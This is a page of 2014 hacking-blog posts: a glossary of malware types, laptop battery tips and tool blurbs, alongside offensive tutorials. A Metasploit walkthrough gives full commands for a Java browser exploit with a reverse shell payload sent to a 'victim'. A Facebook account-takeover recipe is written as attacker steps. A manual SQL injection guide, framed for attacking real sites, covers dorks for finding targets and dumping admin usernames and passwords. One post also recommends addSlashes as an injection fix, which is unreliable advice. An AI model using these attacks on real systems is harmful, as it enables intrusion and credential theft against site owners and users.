Slider 1 mini Slider 2 mini

Sunday, 2 March 2014

Different Types of Computer Viruses. What is Viruses?

Filled under:

Different Types of Computer Viruses. What is Viruses?

computer-virus  What is a Computer Virus ?
A potentially damaging computer programme capable of reproducing itself causing great harm to files or other programs without permission or knowledge of the user.
A program that when run, has the ability to self-replicate by infecting other programs and files on your computer. These programs can have many effects ranging from wiping your hard drive, displaying a joke in a small box, or doing nothing at all except to replicate itself. These types of infections tend to be localized to your computer and not have the ability to spread to another computer on their own. The word virus has incorrectly become a general term that encompasses trojans, worms, and viruses.
1) Boot Sector Virus :- Boot sector viruses infect either the master boot record of the hard disk or the floppy drive. The boot record program responsible for the booting of operating system is replaced by the virus. The virus either copies the master boot program to another part of the hard disk or overwrites it. They infect a computer when it boots up or when it accesses the infected floppy disk in the floppy drive. i.e. Once a system is infected with a boot-sector virus, any non-write-protected disk accessed by this system will become infected. Examples of boot- sector viruses are Michelangelo and Stoned.
2) File or Program Viruses :- Some files/programs, when executed, load the virus in the memory and perform predefined functions to infect the system. They infect program files with extensions like .EXE, .COM, .BIN, .DRV and .SYS .
Some common file viruses are Sunday, Cascade.
3) Multipartite Viruses :- A multipartite virus is a computer virus that infects multiple different target platforms, and remains recursively infective in each target. It attempts to attack both the boot sector and the executable, or programs, files at the same time. When the virus attaches to the boot sector, it will in turn affect the system’s files, and when the virus attaches to the files, it will in turn infect the boot sector. This type of virus can re-infect a system over and over again if all parts of the virus are not eradicated.
Ghostball was the first multipartite virus, discovered by Fridrik Skulason in October 1989.
Other examples are Invader, Flip, etc.
4) Stealth Viruses :-These viruses are stealthy in nature means it uses various methods for hiding themselves to avoid detection. They sometimes remove themselves from the memory temporarily to avoid detection by antivirus. They are somewhat difficult to detect. When an antivirus program tries to detect the virus, the stealth virus feeds the antivirus program a clean image of the file or boot sector.
5) Polymorphic Viruses :- Polymorphic viruses have the ability to mutate implying that they change the viral code known as the signature each time they spread or infect. Thus an antivirus program which is scanning for specific virus codes unable to detect it’s presense.
6) Macro Viruses :- A macro virus is a computer virus that “infects” a Microsoft Word or similar application and causes a sequence of actions to be performed automatically when the application is started or something else triggers it. Macro viruses tend to be surprising but relatively harmless.A macro virus is often spread as an e-mail virus. Well-known examples are Concept Virus and Melissa Worm.
7) Rootkit Virus:- A rootkit virus is an undetectable virus which attempts to allow someone to gain control of a computer system. The term rootkit comes from the linux administrator root user. These viruses are usually installed by trojans and are normally disguised as operating system files.
8) Logic Bombs/Time Bombs:- These are viruses which are programmed to initiate at a specific date or when a specific event occurs. Some examples are a virus which deletes your photos on Halloween, or a virus which deletes a database table if a certain employee gets fired.
 Malware – Malware is programming or files that are developed for the purpose of doing harm. Thus, malware includes computer viruses, worms, Trojan horses, spyware, hijackers, and certain type of adware.
 Backdoor- A program that allows a remote user to execute commands and tasks on your computer without your permission. These types of programs are typically used to launch attacks on other computers, distribute copyrighted software or media, or hack other computers.
Hijackers- A program that attempts to hijack certain Internet functions like redirecting your start page to the hijacker’s own start page, redirecting search queries to a undesired search engine, or replace search results from popular search engines with their own information.
Spyware- A program that monitors your activity or information on your computer and sends that information to a remote computer without your Knowledge.
Adware- A program that generates popups on your computer or displays advertisements. It is important to note that not all adware programs are necessarily considered malware.There are many legitimate programs that are given for free that display ads in their programs in order to generate revenue. As long as this information is provided up front then they are generally not considered malware.
Dialler - A program that typically dials a premium rate number that has per minute charges over and above the typical call charge. These calls are with the intent of gaining access to pornographic material.
Trojan- A program that has been designed to appear innocent but has been intentionally designed to cause some malicious activity or to provide a backdoor to your system.
Worm- A program that when run, has the ability to spread to other computers on its own using either mass-mailing techniques to email addresses found on your computer or by using the Internet to infect a remote computer using known security holes.

Posted By Konduru Jashwanth08:50

Hacking Anyone Facebook Account with just a text message

Filled under:

Hacking Anyone Facebook Account with just a text message

Can you ever imagine that a single text message is enough to hack any Facebook account without user interaction or without using any other malicious stuff like Trojans, phishing, keylogger etc. ?
 Hackers Used It To Hack People’s Facebook Before A White Hat HackerReport It To Facebook 

Today we are going to explain you that how a UK based Security Researcher, “fin1te” is able to hack any Facebook account within a minute by doing one SMS.
Because 90% of us are Facebook user too, so we know that there is an option of linking your mobile number with your account, which allows you to receive Facebook account updates via SMS directly to your mobile and also you can login into your account using that linked number rather than your email address or username.
According to hacker, the loophole was in phone number linking process, or in technical terms, at file /ajax/settings/mobile/confirm_phone.php
This particular webpage works in background when user submit his phone number and verification code, sent by Facebook to mobile. That submission form having two main parameters, one for verification code, and second is profile_id, which is the account to link the number to.

As attacker, follow these steps to execute hack:
Change value of profile_id to the Victim’s profile_id value by tampering the parameters.
Send the letter F to 32665, which is Facebook’s SMS shortcode in the UK. You will receive an 8 character verification code back.
Enter that code in the box or as confirmation_code parameter value and Submit the form.
Facebook will accept that confirmation code and attacker’s mobile number will be linked to victim’s Facebook profile.
In next step hacker just need to go to Forgot password option and initiate the password reset request against of victim’s account.
Attacker now can get password recovery code to his own mobile number which is linked to victim’s account using above steps. Enter the code and Reset the password!
Facebook no longer accepting the profile_id parameter from the user end after receiving the bug report from the hacker.

Posted By Konduru Jashwanth08:41

4 Best Security Tools To Keep You Saf

Filled under:

4 Best Security Tools To Keep You Safe


Eraser is an advanced security tool, which allows you to completely remove sensitive data (erase files and folders) from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP, Vista, Windows 2003 Server and DOS.

NoTrax allows you to surf the Internet anonymously (private browsing). No Registry or Index.dat worries. Erases the Browser’s Cache. Cache is held in memory (not on the disk) and is erased super fast. Memory is pattern wiped on shutdown. No information is stored randomly on your Hard Drive. Works with Windows 95, 98, ME, NT, 2000, XP, Vista, Win 7, Windows 2003 Server and DOS.

SnugServer puts an end to the confusing array of applications and expertise needed to install and configure a workable internet domain presence.  It is an ‘all-in-one’, easily configurable Server package. It comes with an Email Server, WebServer, FTPServer, ListServer & NewsServer.

SpamBlackout stops Spam Emails and Viruses before you download them to your email client program e.g. Ms Outlook/Express etc.  It will scan emails downloaded from POP3, Hotmail and IMAP.  Works with any Email Client e.g. Ms Outlook, Ms Express.

Posted By Konduru Jashwanth07:54

Increase battery life of your laptop-How to Guide

Filled under:

Increase battery life of your laptop-How to Guide

Every laptop or Netbook user these days have the same headache of limited backup time of batteries. As far as your system is new , you will have a good backup time but when it becomes a few months old you will definitely face problem oflimited battery life.
So here I am giving you a solution to Increase battery life of your laptop upto a sufficient extent.
There is an inbuilt command in your computer to Increasebattery life as well as the performance of the system but not all users are aware of it. Some laptops directly provide an interface with option termed as “ POWER SAVING MODE ” but  if your laptop is old or don’t have this feature by default , you need not to worry because you can do the same task manually.
If you have a laptop with Windows 7 installed, you can use the ‘powercfg‘ command . It will display useful information about your laptop’s energy consumption and usage. If  you can understand and maintain  it correctly then you can extend your Battery life and performance by great amount.

Steps Increase battery life of your laptop

Step 1: Click on the Start Menu and type “ CMD ” in the Start Search bar.
Step 2: The search will start and it will then display an icon of “ CMD ” . simply right click on it and select Run as administrator.
Step 3: It will open command line, now simply run the command “powercfg -energy” without quotes. (For windows 7 users.)
Windows 8 users can Simply run the command “powercfg /energy” without quotes.
Step 4: Now Press “Enter”.
Once you successfully execute this command , Windows  will run a complete scan of  your system and it will find some ways to improve performance and power efficiency.
The results of this process will be saved to an HTML file, which is commonly  present  in the “System32” folder of most of the systems.
To access this file, simply follow the path which will be displayed in command prompt window after completion of the command. Read This file to understand that what program in your system is consuming more power and degrading the performance. Fix the Problem to Increase battery life of your laptop.

Some More Usefull Tips to Increase battery life

  • Eject or Remove External Devices like Pendrive/DVDs/External HDD if not in Use
  • Run Apps that don’t Eat up much RAM
  • Disable Bluetooth of your Laptop if not in use.
  • Reduce Screen Brightness, This takes away lot of your battery, Reducing Brightness will help
  • Turn of Internet if you are not using it.
  • Make sure your Laptop’s Temperature remains Low
I am quite sure Performing these Tasks will help you to Increase battery life of your laptop.

Posted By Konduru Jashwanth07:49

Saturday, 1 March 2014


Filled under:



This vulnerability is exploited in February 2013.Additionally, this module bypasses default security settings introduced in Java 7 Update 10 to run unsigned applet without displaying any warning to the user.

Any O.S. Which is running java 7 update 10 is exploitable. Just attacker require metasploit.

Open your terminal & type following code

use exploit/windows/browser/java_jre17_jmxbean_2
msf exploit (java_jre17_jmxbean_2)>set payload java/shell_reverse_tcp
msf exploit (java_jre17_jmxbean_2)>set lhost (IP of Local Host)
msf exploit (java_jre17_jmxbean_2)>set srvhost (This must be an address on the local machine)
msf exploit (java_jre17_jmxbean_2)>set uripath / (The Url to use for this exploit)
msf exploit (java_jre17_jmxbean_2)>exploit

Now an URL you should give to your victim
Send link to victim. As soon as he clicked you got session. Type following command.

Sessions -l
sessions -i 1

Now you get victim `s shell.

Posted By Konduru Jashwanth21:15

Hack an Website ? SQL Injection ? Very simple

Hack an Website ? SQL Injection ? Very simple

Are you looking for some useful tips to improve your web projects security? In this post I suggest you some interesting points about this topic.
Hacking is very interesting topic you can improve programming skill.
SQL Injection
SQL Injection like this

Login Java Code

String userid = request.getParameter(“userid”);
String password = request.getParameter(“password”);
connection = DriverManager.getConnection(“jdbc:odbc:projectDB”);query = “SELECT * FROM Users WHERE user_id =’” + userid + “‘ AND password =’” + password +”‘”;
PreparedStatement ps = connection.prepareStatement(query);
ResultSet users = ps.executeQuery();
//some thing here

Injection Works like this

query = “SELECT * FROM Users WHERE user_id =” OR 1=1; /* AND password =’*/–’”;
Login PHP Code;
Username = ‘ OR 1=1;//
Password = ….
$mypassword=$_POST['pwd'];$sql=”SELECT * FROM users WHERE user=’$myusername’ and password=’$mypassword’”;
//some code
else {

Injection Works like this

$sql=”SELECT * FROM users WHERE user=”OR 1 = 1;//’ and password=’….’”;
How to avoid these mistakes Use addSlashes() function adding slashes(/) to the string in java and php
//Java Code
addSlashes(String userid);// PHP Code
Hacker is intelligent than programmer. So always hide the file extension (eg: *.jsp,*.php,*.asp). to to
In Java redirect this URL links using Web.xml file and inn php write .htaccess file in root directory.

Posted By Konduru Jashwanth19:39

Sql Injection Manually .?

Filled under:

How to do SQL injection manually?

According to Wikipedia, SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

You can also do it by using some tools ,here we are doing without use of tools.

If you want to do easily with help of tools then read my previous tutorial using HAVIJ here .

Let us have a look at the contents of this tutorial..

Part One - Website Assessment

- Finding a vulnerable website

- Determining the amount of columns

- Finding which columns are vulnerable

Part Two - Gathering Information

- Determining the SQL version

- Finding the database

Part Three - The Good Part

- Finding the table names

- Finding the column names

- Displaying the column contents

- Finding the admin page

Let us begin now.

Part One - Website Assessment

In order for us to start exploiting a website we must first know exactly what we are injecting into. This is what we will be covering in Part One along with how to assess the information that we gather.

Finding a vulnerable website

Vulnerable websites can be found using dorks (I will include a list at the end of this tutorial), either in Google or with an exploit scanner. If you are unfamiliar with the term "dorks",

Dorks are website URLs that are possibly vulnerable. In SQL injection these dorks look like this:



This will be inputted into Google's search bar and because of the "inurl:" part of the dork, the search engine will return results with URLs that contain the same characters. Some of the sites that have this dork on their website may be vulnerable to SQL injection.

Now let's say we found the page:


In order to test this site all we need to do is add a ' either in between the "=" sign and the "1" or after the "1" so it looks like this:



After pressing enter, if this website returns an error such as the following:


Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home1/michafj0/public_html/gallery.php on line 5

Or something similar, this means it's vulnerable to injection.

Determining the amount of columns

If we want to use commands and get results we must know how many columns there are on a website.

To find the number of columns we write a query with incrementing values until we get an error, like this:

Code: ORDER BY 1-- <---No error ORDER BY 2-- <---No error ORDER BY 3-- <---No error ORDER BY 4-- <---No error ORDER BY 5-- <---ERROR!

This means that there are four columns!



Finding which columns are vulnerable

So we know that there are four columns now we have to find out which ones are vulnerable to injection. To do this we will use the UNION and SELECT queries while keeping the double null (--) at the end of the string.

Code: UNION SELECT 1,2,3,4--

Don't forget to put the extra null(-) in between the "=" sign and the value (the number).


Now after entering that query you should be able to see some numbers somewhere on the page that seem out of place. Those are the numbers of the columns that are vulnerable to injection. We can use those columns to pull information from the database which we will see in Part Two.

Part Two - Gathering Information

In this part we will discover how to find the name of the database and what version of SQL the website is using by using queries to exploit the site.

Determining the SQL version.

Finding the version of the SQL of the website is a very important step because the steps you take for version 4 are quite different from version 5 in order to get what you want. In this tutorial, I will not be covering version 4.

If we look back to the end of Part One we saw how to find the vulnerable columns. Using that information we can put together our next query (I will be using column 2 as an example). The command should look like this:

Code: UNION SELECT 1,@@version,3,4--

Because 2 is the vulnerable column, this is where we will place "@@version". Another string that could replace "@@version" is "version()".

If the website still does not display the version try using unhex(hex()) which looks like this:

Code: UNION SELECT 1,unhex(hex(@@version)),3,4--

NOTE: If this method is used here, it must be used for the rest of the injection as well.

Now what you want to see is something along these lines:



Which is the version of the SQL for the website.

NOTE: If you see version 4 and you would like to have a go at it, there are other tutorials that explain how to inject into it.

Finding the database

To find the database we use a query like the one below:

Code: UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata--

This could sometimes return more results than necessary and so that is when we switch over to this query instead:

Code: UNION SELECT 1,concat(database()),3,4--

You now have the name of the database! Congratulations. Copy and paste the name somewhere safe, we'll need it for later.

Part Three - The Good Part

This is the fun part where we will find the usernames, emails and passwords!

Finding the table names

To find the table names we use a query that is similar to the one used for finding the database with a little bit extra added on:

Code: UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--

It may look long and confusing but once you understand it, it really isn't so. What this query does is it "groups" (group_concat) the "table names" (table_name) together and gathers that information "from" (FROM) information_schema.tables where the "table schema" (table_schema) can be found in the "database" (database()).

NOTE: While using group_concat you will only be able to see 1024 characters worth of tables so if you notice that a table is cut off on the end switch over to limit which I will explain now.

Code: UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1--

What this does is it shows the first and only the first table. So if we were to run out of characters on let's say the 31st table we could use this query:

Code: UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 30,1--

Notice how my limit was 30,1 instead of 31,1? This is because when using limit is starts from 0,1 which means that the 30th is actually the 31st Tongue

You now have all the table names!

Finding the column names

Now that you have all of the table names try and pick out the one that you think would contain the juicy information. Usually they're tables like User(s), Admin(s),

tblUser(s) and so on but it varies between sites.

After deciding which table you think contains the information, use this query (in my example, I'll be using the table name "Admin"):

Code: UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="Admin"--

This will either give you a list of all the columns within the table or give you an error but don't panic if it is outcome #2! All this means is that Magic Quotes is turned on. This can be bypassed by using a hex or char converter (they both work) to convert the normal text into char or hex.

UPDATE: If you get an error at this point all you must do is follow these steps:

1. Copy the name of the table that you are trying to access.

2. Paste the name of the table into this website where it says "Say Hello To My Little Friend".

Hex/Char Converter

3. Click convert.

4. Copy the string of numbers/letters under Hex into your query so it looks like this:

Code: UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x41646d696e--

Notice how before I pasted the hex I added a "0x", all this does is tells the server that the following characters are part of a hex string.

You should now see a list of all the columns within the table such as username, password, and email.

NOTE: Using the limit function does work with columns as well.

Displaying the column contents

We're almost done! All we have left to do is to see what's inside those columns and use the information to login! To view the columns we need to decide which ones we want to see and then use this query (in this example I want to view the columns "username", "password", and "email", and my database name will be "db123"). This is where the database name comes in handy:

Code: UNION SELECT 1,group_concat(username,0x3a,password,0x3a,email),3,4 FROM db123.Admin--

In this query, 0x3a is the hex value of a colon ( which will group the username:password:email for the individual users just like that.

FINALLY! Now you have the login information for the users of the site, including the admin. All you have to do now is find the admin login page which brings us to Section Four.

Finding the admin page

Usually the admin page will be directly off of the site's home page, here are some examples:


Once again there are programs that will find the page for you but first try some of the basic guesses, it might save you a couple of clicks. If you do use a program

Reiluke has coded one for that as well. Search Admin Finder by Reiluke.

And that conlcudes my tutorial! I hope it was helpful to some of you. Remember to keep practicing and eventually you'll have all of the queries memorized in no time!


click to begin

1.2MB .zip

Posted By Konduru Jashwanth19:18